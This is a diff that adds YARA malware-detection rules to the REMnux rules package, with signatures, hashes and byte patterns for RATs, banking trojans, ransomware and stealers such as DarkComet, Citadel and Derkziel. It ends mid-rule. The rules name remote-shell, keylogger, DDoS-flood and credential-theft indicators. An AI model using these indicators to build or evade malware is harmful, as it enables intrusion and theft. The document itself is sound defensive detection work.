+++ remnux-rules-0.0.4/yara/malware/Cerberus.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,25 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Cerberus : rat
+{
+	meta:
+		description = "Cerberus"
+		author = "Jean-Philippe Teissier / @Jipe_"
+		date = "2013-01-12"
+		filetype = "memory"
+		version = "1.0" 
+
+	strings:
+		$checkin = "Ypmw1Syv023QZD"
+		$clientpong = "wZ2pla"
+		$serverping = "wBmpf3Pb7RJe"
+		$generic = "cerberus" nocase
+
+	condition:
+		any of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Chicken.yar remnux-rules-0.0.4/yara/malware/Chicken.yar
--- remnux-rules-0.0.3/yara/malware/Chicken.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Chicken.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,42 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as
+    long as you use it under this license.
+*/
+
+rule ChickenDOS{
+    meta:
+        author = "Jason Jones <jasonjones@arbor.net>"
+        description = "Win32-variant of Chicken ident for both dropper and dropped file"
+        source = "https://github.com/arbor/yara/blob/master/chicken.yara"
+    strings:
+        $pdb1 = "\\Chicken\\Release\\svchost.pdb"
+        $pdb2 = "\\IntergrateCHK\\Release\\IntergrateCHK.pdb"
+        $str2 = "fake.cf"
+        $str3 = "8.8.8.8"
+        $str4 = "Processor(%d)\\"
+        $str5 = "DbProtectSupport"
+        $str1 = "dm1712/`jvpnpkte/bpl"
+        $str6 = "InstallService NPF %d"
+        $str7 = "68961"
+        $str8 = "InstallService DbProtectSupport %d"
+        $str9 = "C:\\Program Files\\DbProtectSupport\\npf.sys"
+    condition:
+        ($pdb1 or $pdb2) and 5 of ($str*)
+}
+
+rule ChickenDOS_Linux {
+    meta:
+        author = "Jason Jones <jasonjones@arbor.net>"
+        description = "Linux-variant of Chicken ident for both dropper and dropped file"
+        source = "https://github.com/arbor/yara/blob/master/chicken.yara"
+    strings:
+        $cfg = "fake.cfg"
+        $file1 = "ThreadAttack.cpp"
+        $file2 = "Fake.cpp"
+        $str1 = "dns_array"
+        $str2 = "DomainRandEx"
+        $str3 = "cpu %llu %llu %llu %llu"
+        $str4 = "[ %02d.%02d %02d:%02d:%02d.%03ld ] [%lu] [%s] %s" ascii
+    condition:
+        $cfg and all of ($file*) and 3 of ($str*)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Citadel.yar remnux-rules-0.0.4/yara/malware/Citadel.yar
--- remnux-rules-0.0.3/yara/malware/Citadel.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Citadel.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,26 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+rule citadel13xy : banker
+{
+	meta:
+		author = "Jean-Philippe Teissier / @Jipe_"
+		description = "Citadel 1.5.x.y trojan banker"
+		date = "2013-01-12" 
+		version = "1.0" 
+		filetype = "memory"
+
+	strings:
+		$a = "Coded by BRIAN KREBS for personnal use only. I love my job & wife."
+		$b = "http://%02x%02x%02x%02x%02x%02x%02x%02x.com/%02x%02x%02x%02x/%02x%02x%02x%02x%02x.php"
+		$c = "%BOTID%"
+		$d = "%BOTNET%"
+		$e = "cit_video.module"
+		$f = "bc_remove"
+		$g = "bc_add"
+		$ggurl = "http://www.google.com/webhp"
+
+	condition:
+		3 of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Cookies.yar remnux-rules-0.0.4/yara/malware/Cookies.yar
--- remnux-rules-0.0.3/yara/malware/Cookies.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Cookies.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,46 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule CookiesStrings : Cookies Family
+{
+    meta:
+        description = "Cookies Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-20"
+        
+    strings:
+        $zip1 = "ntdll.exePK"
+        $zip2 = "AcroRd32.exePK"
+        $zip3 = "Setup=ntdll.exe\x0d\x0aSilent=1\x0d\x0a"
+        $zip4 = "Setup=%temp%\\AcroRd32.exe\x0d\x0a"
+        $exe1 = "Leave GetCommand!"
+        $exe2 = "perform exe success!"
+        $exe3 = "perform exe failure!"
+        $exe4 = "Entry SendCommandReq!"
+        $exe5 = "Reqfile not exist!"
+        $exe6 = "LeaveDealUpfile!"
+        $exe7 = "Entry PostData!"
+        $exe8 = "Leave PostFile!"
+        $exe9 = "Entry PostFile!"
+        $exe10 = "\\unknow.zip" wide ascii
+        $exe11 = "the url no respon!"
+        
+    condition:
+      (2 of ($zip*)) or (2 of ($exe*))
+}
+
+rule Cookies : Family
+{
+    meta:
+        description = "Cookies"
+        author = "Seth Hardy"
+        last_modified = "2014-06-20"
+        
+    condition:
+        CookiesStrings
+}
+
diff -Nru remnux-rules-0.0.3/yara/malware/CorkowDLL.yar remnux-rules-0.0.4/yara/malware/CorkowDLL.yar
--- remnux-rules-0.0.3/yara/malware/CorkowDLL.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/CorkowDLL.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,21 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+rule CorkowDLL {
+	meta:
+		description = "Rule to detect the Corkow DLL files" 
+		reference = "IB-Group | http://www.group-ib.ru/brochures/Group-IB-Corkow-Report-EN.pdf"
+	strings:
+
+		$mz = { 4d 5a }
+		$binary1 = {60 [0-8] 9C [0-8] BB ?? ?? ?? ?? [0-8] 81 EB ?? ?? ?? ?? [0-8] E8 ?? 00 00 00 [0-8] 58 [0-8] 2B C3} 
+		$binary2 = {(FF75??|53)FF7510FF750CFF7508E8????????[3-9]C9C20C 00} 
+		$export1 = "Control_RunDLL"
+		$export2 = "ServiceMain"
+		$export3 = "DllGetClassObject"
+
+	condition:
+
+		($mz at 0) and ($binary1 and $binary2) and any of ($export*)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Crime_Fareit.yar remnux-rules-0.0.4/yara/malware/Crime_Fareit.yar
--- remnux-rules-0.0.3/yara/malware/Crime_Fareit.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Crime_Fareit.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,32 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+*/
+
+/*
+	Yara Rule Set
+	Author: Florian Roth
+	Date: 2015-10-18
+	Identifier: Fareit Oct 2015
+*/
+
+rule Fareit_Trojan_Oct15 {
+	meta:
+		description = "Detects Fareit Trojan from Sep/Oct 2015 Wave"
+		author = "Florian Roth"
+		reference = "http://goo.gl/5VYtlU"
+		date = "2015-10-18"
+		score = 80
+		super_rule = 1
+		hash1 = "230ca0beba8ae712cfe578d2b8ec9581ce149a62486bef209b04eb11d8c088c3"
+		hash2 = "3477d6bfd8313d37fedbd3d6ba74681dd7cb59040cabc2991655bdce95a2a997"
+		hash3 = "408fa0bd4d44de2940605986b554e8dab42f5d28a6a525b4bc41285e37ab488d"
+		hash4 = "76669cbe6a6aac4aa52dbe9d2e027ba184bf3f0b425f478e8c049637624b5dae"
+		hash5 = "9486b73eac92497e703615479d52c85cfb772b4ca6c846ef317729910e7c545f"
+		hash6 = "c3300c648aebac7bf1d90f58ea75660c78604410ca0fa705d3b8ec1e0a45cdd9"
+		hash7 = "ff83e9fcfdec4ffc748e0095391f84a8064ac958a274b9684a771058c04cb0fa"
+	strings:
+		$s1 = "ebai.exe" fullword wide
+		$s2 = "Origina" fullword wide
+	condition:
+		uint16(0) == 0x5a4d and $s1 in (0..30000) and $s2 in (0..30000)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/CRIME_Shifu_trojan.yar remnux-rules-0.0.4/yara/malware/CRIME_Shifu_trojan.yar
--- remnux-rules-0.0.3/yara/malware/CRIME_Shifu_trojan.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/CRIME_Shifu_trojan.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,68 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+*/
+rule Shifu_Banking_Trojan {
+	meta:
+		description = "Detects Shifu Banking Trojan"
+		author = "Florian Roth"
+		reference = "https://securityintelligence.com/shifu-masterful-new-banking-trojan-is-attacking-14-japanese-banks/"
+		date = "2015-09-01"
+		hash1 = "4ff1ebea2096f318a2252ebe1726bcf3bbc295da9204b6c720b5bbf14de14bb2"
+		hash2 = "4881c7d89c2b5e934d4741a653fbdaf87cc5e7571b68c723504069d519d8a737"
+	strings:
+		$x1 = "c:\\oil\\feet\\Seven\\Send\\Gather\\Dividerail.pdb" fullword ascii
+
+		$s1 = "listen above" fullword wide
+		$s2 = "familycould cost" fullword wide
+		$s3 = "SetSystemTimeAdjustment" fullword ascii /* Goodware String - occured 33 times */
+		$s4 = "PeekNamedPipe" fullword ascii /* Goodware String - occured 347 times */
+	condition:
+		uint16(0) == 0x5a4d and filesize < 1000KB and ($x1 or all of ($s*))
+}
+
+rule SHIFU_Banking_Trojan {
+	meta:
+		description = "Detects SHIFU Banking Trojan"
+		author = "Florian Roth"
+		reference = "http://goo.gl/52n8WE"
+		date = "2015-10-31"
+		score = 70
+		hash1 = "0066d1c8053ff8b0c07418c7f8d20e5cd64007bb850944269f611febd0c1afe0"
+		hash2 = "3956d32a870d81be34cafc867769b2a2f55a96360070f1cb3d9addc2918357d5"
+		hash3 = "3fde1b2b50fcb36a695f1e6bc577cd930c2343066d98982cf982393e55bfce0d"
+		hash4 = "457ad4a4d4e675fe09f63873ca3364434dc872dde7d9b64ce7db919eaff47485"
+		hash5 = "51edba913e8b83d1388b1be975957e439015289d51d3d5774d501551f220df6f"
+		hash6 = "6611a2b79a3acf0003b1197aa5bfe488a33db69b663c79c6c5b023e86818d38b"
+		hash7 = "72e239924faebf8209f8e3d093f264f778a55efb56b619f26cea73b1c4feb7a4"
+		hash8 = "7a29cb641b9ac33d1bb405d364bc6e9c7ce3e218a8ff295b75ca0922cf418290"
+		hash9 = "92fe4f9a87c796e993820d1bda8040aced36e316de67c9c0c5fc71aadc41e0f8"
+		hash10 = "93ecb6bd7c76e1b66f8c176418e73e274e2c705986d4ac9ede9d25db4091ab05"
+		hash11 = "a0b7fac69a4eb32953c16597da753b15060f6eba452d150109ff8aabc2c56123"
+		hash12 = "a8b6e798116ce0b268e2c9afac61536b8722e86b958bd2ee95c6ecdec86130c9"
+		hash13 = "d6244c1177b679b3d67f6cec34fe0ae87fba21998d4f5024d8eeaf15ca242503"
+		hash14 = "dcc9c38e695ffd121e793c91ca611a4025a116321443297f710a47ce06afb36d"
+	strings:
+		$x1 = "\\Gather\\Dividerail.pdb" ascii
+
+		$s0 = "\\payload\\payload.x86.pdb" ascii
+		$s1 = "USER_PRIV_GUEST" fullword wide
+		$s2 = "USER_PRIV_ADMIN" fullword wide
+		$s3 = "USER_PRIV_USER" fullword wide
+		$s4 = "PPSWVPP" fullword ascii
+		$s5 = "WinSCard.dll" fullword ascii /* Goodware String - occured 83 times */
+	condition:
+		uint16(0) == 0x5a4d and ($x1 or 5 of ($s*))
+}
+rule Shifu : Shifu {
+	meta:
+		reference = "https://blogs.mcafee.com/mcafee-labs/japanese-banking-trojan-shifu-combines-malware-tools/"
+		author = "McAfee Labs"
+	strings:
+		$b = "RegCreateKeyA"
+		$a = "CryptCreateHash"
+		$c = {2F 00 63 00 20 00 73 00 74 00 61 00 72 00 74 00 20 00 22 00 22 00 20 00 22 00 25 00 73 00 22 00 20 00 25 00 73 00 00 00 00 00 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 00 00 72 00 75 00 6E}
+		$d = {53 00 6E 00 64 00 56 00 6F 00 6C 00 2E 00 65 00 78 00 65}
+		$e = {52 00 65 00 64 00 69 00 72 00 65 00 63 00 74 00 45 00 58 00 45}
+	condition:
+		all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/crime_upatre_oct15.yar remnux-rules-0.0.4/yara/malware/crime_upatre_oct15.yar
--- remnux-rules-0.0.3/yara/malware/crime_upatre_oct15.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/crime_upatre_oct15.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,48 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+/*
+	Yara Rule Set
+	Author: Florian Roth
+	Date: 2015-10-13
+	Identifier: Upatre Campaign October 2015
+*/
+
+rule Upatre_Hazgurut {
+	meta:
+		description = "Detects Upatre malware - file hazgurut.exe"
+		author = "Florian Roth"
+		reference = "https://weankor.vxstream-sandbox.com/sample/6b857ef314938d37997c178ea50687a281d8ff9925f0c4e70940754643e2c0e3?environmentId=7"
+		date = "2015-10-13"
+		score = 70
+		hash1 = "7ee0d20b15e24b7fe72154d9521e1959752b4e9c20d2992500df9ac096450a50"
+		hash2 = "79ffc620ddb143525fa32bc6a83c636168501a4a589a38cdb0a74afac1ee8b92"
+		hash3 = "62d8a6880c594fe9529158b94a9336179fa7a3d3bf1aa9d0baaf07d03b281bd3"
+		hash4 = "c64282aca980d558821bec8b3dfeae562d9620139dc43d02ee4d1745cd989f2a"
+		hash5 = "a35f9870f9d4b993eb094460b05ee1f657199412807abe6264121dd7cc12aa70"
+		hash6 = "f8cb2730ebc8fac1c58da1346ad1208585fe730c4f03d976eb1e13a1f5d81ef9"
+		hash7 = "b65ad7e2d299d6955d95b7ae9b62233c34bc5f6aa9f87dc482914f8ad2cba5d2"
+		hash8 = "6b857ef314938d37997c178ea50687a281d8ff9925f0c4e70940754643e2c0e3"
+		hash9 = "33a288cef0ae7192b34bd2ef3f523dfb7c6cbc2735ba07edf988400df1713041"
+		hash10 = "2a8e50afbc376cb2a9700d2d83c1be0c21ef942309676ecac897ba4646aba273"
+		hash11 = "3d0f2c7e07b7d64b1bad049b804ff1aae8c1fc945a42ad555eca3e1698c7f7d3"
+		hash12 = "951360b32a78173a1f81da0ded8b4400e230125d05970d41621830efc5337274"
+		hash13 = "bd90faebfd7663ef89b120fe69809532cada3eb94bb94094e8bc615f70670295"
+		hash14 = "8c5823f67f9625e4be39a67958f0f614ece49c18596eacc5620524bc9b6bad3d"
+	strings:
+		$a1 = "barcod" fullword ascii
+
+		$s0 = "msports.dll" fullword ascii
+		$s1 = "nddeapi.dll" fullword ascii
+		$s2 = "glmf32.dll" fullword ascii
+		$s3 = "<requestedExecutionLevel level=\"requireAdministrator\" uiAccess=\"false\">" fullword ascii
+		$s4 = "cmutil.dll" fullword ascii
+		$s5 = "mprapi.dll" fullword ascii
+		$s6 = "glmf32.dll" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 1500KB
+		and $a1 in (0..4000)
+		and all of ($s*)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Crimson_RAT.yar remnux-rules-0.0.4/yara/malware/Crimson_RAT.yar
--- remnux-rules-0.0.3/yara/malware/Crimson_RAT.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Crimson_RAT.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,20 @@
+rule Crimson
+{
+	meta:
+		author = " Kevin Breen <kevin@techanarchy.net>"
+		Description = "Crimson Rat"
+		date = "2015/05"
+		ref = "http://malwareconfig.com/stats/Crimson"
+		maltype = "Remote Access Trojan"
+		filetype = "jar"
+
+	strings:
+		$a1 = "com/crimson/PK"
+		$a2 = "com/crimson/bootstrapJar/PK"
+		$a3 = "com/crimson/permaJarMulti/PermaJarReporter$1.classPK"
+		$a4 = "com/crimson/universal/containers/KeyloggerLog.classPK"
+        $a5 = "com/crimson/universal/UploadTransfer.classPK"
+        
+	condition:
+        all of ($a*)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Crypren_ransomware remnux-rules-0.0.4/yara/malware/Crypren_ransomware
--- remnux-rules-0.0.3/yara/malware/Crypren_ransomware	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Crypren_ransomware	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,12 @@
+rule Ransom : Crypren{
+    meta:
+        weight = 1
+        Author = "@pekeinfo"
+        reference = "https://github.com/pekeinfo/DecryptCrypren"
+    strings: 
+        $a = "won't be able to recover your files anymore.</p>"
+        $b = {6A 03 68 ?? ?? ?? ?? B9 74 F1 AE 00 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 98 3A 00 00 FF D6 6A 00 68 ?? ?? ?? ?? 68 ?? ?? ?? ??}
+        $c = "Please restart your computer and wait for instructions for decrypting your files"
+    condition:
+        any of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Crypren_ransomware.yar remnux-rules-0.0.4/yara/malware/Crypren_ransomware.yar
--- remnux-rules-0.0.3/yara/malware/Crypren_ransomware.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Crypren_ransomware.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,12 @@
+rule Ransom : Crypren{
+    meta:
+        weight = 1
+        Author = "@pekeinfo"
+        reference = "https://github.com/pekeinfo/DecryptCrypren"
+    strings: 
+        $a = "won't be able to recover your files anymore.</p>"
+        $b = {6A 03 68 ?? ?? ?? ?? B9 74 F1 AE 00 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 98 3A 00 00 FF D6 6A 00 68 ?? ?? ?? ?? 68 ?? ?? ?? ??}
+        $c = "Please restart your computer and wait for instructions for decrypting your files"
+    condition:
+        any of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/cxpid.yar remnux-rules-0.0.4/yara/malware/cxpid.yar
--- remnux-rules-0.0.3/yara/malware/cxpid.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/cxpid.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,49 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule cxpidStrings : cxpid Family
+{
+    meta:
+        description = "cxpid Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-23"
+        
+    strings:
+        $ = "/cxpid/submit.php?SessionID="
+        $ = "/cxgid/"
+        $ = "E21BC52BEA2FEF26D005CF"
+        $ = "E21BC52BEA39E435C40CD8"
+        $ = "                   -,L-,O+,Q-,R-,Y-,S-"
+        
+    condition:
+       any of them
+}
+
+rule cxpidCode : cxpid Family 
+{
+    meta:
+        description = "cxpid code features"
+        author = "Seth Hardy"
+        last_modified = "2014-06-23"
+    
+    strings:
+        $entryjunk = { 55 8B EC B9 38 04 00 00 6A 00 6A 00 49 75 F9 }
+    
+    condition:
+        any of them
+}
+
+rule cxpid : Family
+{
+    meta:
+        description = "cxpid"
+        author = "Seth Hardy"
+        last_modified = "2014-06-23"
+        
+    condition:
+        cxpidCode or cxpidStrings
+}
diff -Nru remnux-rules-0.0.3/yara/malware/CyberGate.yar remnux-rules-0.0.4/yara/malware/CyberGate.yar
--- remnux-rules-0.0.3/yara/malware/CyberGate.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/CyberGate.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,27 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as
+    long as you use it under this license.
+*/
+rule CyberGate
+{
+
+	meta:
+		author = " Kevin Breen <kevin@techanarchy.net>"
+		date = "2014/04"
+		ref = "http://malwareconfig.com/stats/CyberGate"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
+
+	strings:
+		$string1 = {23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23}
+		$string2 = {23 23 23 23 40 23 23 23 23 FA FD F0 EF F9 23 23 23 23 40 23 23 23 23}
+		$string3 = "EditSvr"
+		$string4 = "TLoader"
+		$string5 = "Stroks"
+		$string6 = "####@####"
+		$res1 = "XX-XX-XX-XX"
+		$res2 = "CG-CG-CG-CG"
+
+	condition:
+		all of ($string*) and any of ($res*)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Cythosia.yar remnux-rules-0.0.4/yara/malware/Cythosia.yar
--- remnux-rules-0.0.3/yara/malware/Cythosia.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Cythosia.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,15 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as
+    long as you use it under this license.
+*/
+rule Cythosia{
+    meta:
+        author = "Brian Wallace @botnet_hunter"
+        author_email = "bwall@ballastsecurity.net"
+        date = "2015-03-21"
+        description = "Identify Cythosia"
+    strings:
+        $str1 = "HarvesterSocksBot.Properties.Resources" wide
+    condition:
+        all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/DarkComet.yar remnux-rules-0.0.4/yara/malware/DarkComet.yar
--- remnux-rules-0.0.3/yara/malware/DarkComet.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/DarkComet.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,112 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule DarkComet_1
+{
+    meta:
+        description = "DarkComet RAT"
+	author = "botherder https://github.com/botherder"
+
+    strings:
+        $bot1 = /(#)BOT#OpenUrl/ wide ascii
+        $bot2 = /(#)BOT#Ping/ wide ascii
+        $bot3 = /(#)BOT#RunPrompt/ wide ascii
+        $bot4 = /(#)BOT#SvrUninstall/ wide ascii
+        $bot5 = /(#)BOT#URLDownload/ wide ascii
+        $bot6 = /(#)BOT#URLUpdate/ wide ascii
+        $bot7 = /(#)BOT#VisitUrl/ wide ascii
+        $bot8 = /(#)BOT#CloseServer/ wide ascii
+
+        $ddos1 = /(D)DOSHTTPFLOOD/ wide ascii
+        $ddos2 = /(D)DOSSYNFLOOD/ wide ascii
+        $ddos3 = /(D)DOSUDPFLOOD/ wide ascii
+
+        $keylogger1 = /(A)ctiveOnlineKeylogger/ wide ascii
+        $keylogger2 = /(U)nActiveOnlineKeylogger/ wide ascii
+        $keylogger3 = /(A)ctiveOfflineKeylogger/ wide ascii
+        $keylogger4 = /(U)nActiveOfflineKeylogger/ wide ascii
+
+        $shell1 = /(A)CTIVEREMOTESHELL/ wide ascii
+        $shell2 = /(S)UBMREMOTESHELL/ wide ascii
+        $shell3 = /(K)ILLREMOTESHELL/ wide ascii
+
+    condition:
+        4 of ($bot*) or all of ($ddos*) or all of ($keylogger*) or all of ($shell*)
+}
+
+rule DarkComet_2 : rat
+{
+	meta:
+		description = "DarkComet" 
+		author = "Jean-Philippe Teissier / @Jipe_"
+		date = "2013-01-12"
+		filetype = "memory"
+		version = "1.0" 
+
+	strings:
+		$a = "#BEGIN DARKCOMET DATA --"
+		$b = "#EOF DARKCOMET DATA --"
+		$c = "DC_MUTEX-"
+		$k1 = "#KCMDDC5#-890"
+		$k2 = "#KCMDDC51#-890"
+
+	condition:
+		any of them
+}
+rule DarkComet_3
+{
+	meta:
+		author = " Kevin Breen <kevin@techanarchy.net>"
+		date = "2014/04"
+		ref = "http://malwareconfig.com/stats/DarkComet"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
+
+	strings:
+		// Versions 2x
+		$a1 = "#BOT#URLUpdate"
+		$a2 = "Command successfully executed!"
+		$a3 = "MUTEXNAME" wide
+		$a4 = "NETDATA" wide
+		// Versions 3x & 4x & 5x
+		$b1 = "FastMM Borland Edition"
+		$b2 = "%s, ClassID: %s"
+		$b3 = "I wasn't able to open the hosts file"
+		$b4 = "#BOT#VisitUrl"
+		$b5 = "#KCMDDC"
+	condition:
+		all of ($a*) or all of ($b*)
+}
+
+rule DarkComet_Keylogger_File
+{
+	meta:
+		author = "Florian Roth"
+		description = "Looks like a keylogger file created by DarkComet Malware"
+		date = "25.07.14"
+		reference = "https://raw.githubusercontent.com/Neo23x0/Loki/master/signatures/thor-hacktools.yar"
+		score = 50
+	strings:
+		$magic = "::"
+		$entry = /\n:: [A-Z]/
+		$timestamp = /\([0-9]?[0-9]:[0-9][0-9]:[0-9][0-9] [AP]M\)/
+	condition:
+		($magic at 0) and #entry > 10 and #timestamp > 10
+}
+rule DarkComet_4
+{	meta:
+		reference = "https://github.com/bwall/bamfdetect/blob/master/BAMF_Detect/modules/yara/darkcomet.yara"
+	strings:
+	    $a1 = "#BOT#"
+	    $a2 = "WEBCAMSTOP"
+	    $a3 = "UnActiveOnlineKeyStrokes"
+	    $a4 = "#SendTaskMgr"
+	    $a5 = "#RemoteScreenSize"
+	    $a6 = "ping 127.0.0.1 -n 4 > NUL &&"
+	condition:
+		all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/DDoSTf.yar remnux-rules-0.0.4/yara/malware/DDoSTf.yar
--- remnux-rules-0.0.3/yara/malware/DDoSTf.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/DDoSTf.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,20 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+rule DDosTf : DDoS
+{
+  meta:
+    author = "benkow_ - MalwareMustDie"
+    reference = "http://blog.malwaremustdie.org/2016/01/mmd-0048-2016-ddostf-new-elf-windows.html"
+    description = "Rule to detect ELF.DDosTf infection"
+  strings:
+    $st0 = "ddos.tf"
+    $st1 = {E8 AE BE E7 BD AE 54 43  50 5F 4B 45 45 50 49 4E 54 56 4C E9 94 99 E8 AF AF EF BC 9A 00} /*TCP_KEEPINTVL*/
+    $st2 = {E8 AE BE E7 BD AE 54 43  50 5F 4B 45 45 50 43 4E 54 E9 94 99 E8 AF AF EF BC 9A 00} /*TCP_KEEPCNT*/
+    $st3 = "Accept-Language: zh"
+    $st4 = "%d Kb/bps|%d%%"
+   
+  condition:
+    all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Derkziel_Stealer.yar remnux-rules-0.0.4/yara/malware/Derkziel_Stealer.yar
--- remnux-rules-0.0.3/yara/malware/Derkziel_Stealer.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Derkziel_Stealer.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,24 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+rule Derkziel
+{
+    meta:
+        description = "Derkziel info stealer (Steam, Opera, Yandex, ...)"
+        author = "The Malware Hunter"
+        yaraexchange = "No distribution without author's consent"
+        filetype = "pe"
+        date = "2015-11"
+        md5 = "f5956953b7a4acab2e6fa478c0015972"
+        site = "https://zoo.mlw.re/samples/f5956953b7a4acab2e6fa478c0015972"
+        reference = "https://bhf.su/threads/137898/"
+    strings:
+        $drz = "{!}DRZ{!}"
+        $ua = "User-Agent: Uploador"
+        $steam = "SteamAppData.vdf"
+        $login = "loginusers.vdf"
+        $config = "config.vdf"
+    condition:
+        all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Dexter.yar remnux-rules-0.0.4/yara/malware/Dexter.yar
--- remnux-rules-0.0.3/yara/malware/Dexter.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Dexter.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,37 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Dexter_Malware {
+	meta:
+		description = "Detects the Dexter Trojan/Agent http://goo.gl/oBvy8b"
+		author = "Florian Roth"
+		reference = "http://goo.gl/oBvy8b"
+		date = "2015/02/10"
+		score = 70
+	strings:
+		$s0 = "Java Security Plugin" fullword wide
+		$s1 = "%s\\%s\\%s.exe" fullword wide
+		$s2 = "Sun Java Security Plugin" fullword wide
+		$s3 = "\\Internet Explorer\\iexplore.exe" fullword wide
+	condition:
+		all of them
+}
+rule dexter_strings
+{
+    meta:
+        author = "Brian Wallace @botnet_hunter"
+        author_email = "bwall@ballastsecurity.net"
+        date = "2014-09-10"
+        description = "Identify Dexter POSGrabber"
+    strings:
